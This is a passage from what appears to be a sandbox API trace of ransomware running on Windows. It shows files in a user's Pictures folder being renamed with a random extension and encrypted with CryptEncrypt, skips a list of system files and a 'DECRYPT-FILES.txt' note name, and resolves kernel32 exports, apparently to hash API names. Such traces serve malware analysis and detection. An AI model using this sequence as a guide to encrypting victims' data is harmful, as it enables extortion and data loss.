param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg.RVSeEm") returned 68 [0086.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\cjscda.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg.RVSeEm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\cjscda.jpg.rvseem"), dwFlags=0x0) returned 1 [0086.696] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.696] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.696] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.696] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab403740, ftCreationTime.dwHighDateTime=0x1d4d433, ftLastAccessTime.dwLowDateTime=0x2b91b240, ftLastAccessTime.dwHighDateTime=0x1d4c8ed, ftLastWriteTime.dwLowDateTime=0x2b91b240, ftLastWriteTime.dwHighDateTime=0x1d4c8ed, nFileSizeHigh=0x0, nFileSizeLow=0x1325b, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZLwBD2he.gif", cAlternateFileName="CZLWBD~1.GIF")) returned 1 [0086.696] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="DECRYPT-FILES.txt") returned -1 [0086.696] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="autorun.inf") returned 1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="boot.ini") returned 1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="desktop.ini") returned -1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="ntuser.dat") returned -1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="iconcache.db") returned -1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="bootsect.bak") returned 1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="ntuser.dat.log") returned -1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="thumbs.db") returned -1 [0086.697] lstrcmpiW (lpString1="cZLwBD2he.gif", lpString2="Bootfont.bin") returned 1 [0086.697] lstrlenW (lpString="cZLwBD2he.gif") returned 13 [0086.697] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.697] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.697] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.697] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.697] lstrlenW (lpString="cZLwBD2he.gif") returned 13 [0086.697] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.697] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="cZLwBD2he.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif" [0086.697] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\czlwbd2he.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.697] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=78427) returned 1 [0086.698] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.698] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.698] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.698] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.698] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.698] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.698] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.700] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.700] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.701] CloseHandle (hObject=0x42c) returned 1 [0086.701] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.701] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.702] CloseHandle (hObject=0x0) returned 0 [0086.702] CloseHandle (hObject=0x428) returned 1 [0086.702] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.703] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.703] GetTickCount () returned 0x114e206 [0086.703] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.703] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.703] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.703] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.704] lstrlenA (lpString="kernel32.dll") returned 12 [0086.704] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.704] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.704] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.704] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.704] lstrlenA (lpString="ADDATOMA") returned 8 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.704] lstrlenA (lpString="ADDATOMW") returned 8 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.704] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.704] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.704] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.704] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.704] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.704] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.704] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.705] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.705] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.705] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.705] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.705] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.705] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.705] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.705] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.705] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.705] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.705] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.705] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.705] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.705] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.705] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.705] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.705] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.705] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.706] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.706] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.706] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.706] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.706] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.706] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.706] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.706] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.706] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.706] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.706] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.706] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.706] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.706] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.706] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.706] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.706] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.706] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.707] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.707] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.707] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.707] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.707] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.707] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.707] lstrlenA (lpString="BEEP") returned 4 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.707] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.707] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.707] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.707] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.707] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.707] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.707] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.707] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.707] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.707] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.707] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.708] lstrlenA (lpString="CANCELIO") returned 8 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.708] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.708] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.708] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.708] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.708] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.708] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.708] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.708] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.708] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.708] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.708] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.708] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.708] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.708] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.708] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.708] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.708] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.709] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.709] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.709] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.709] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, 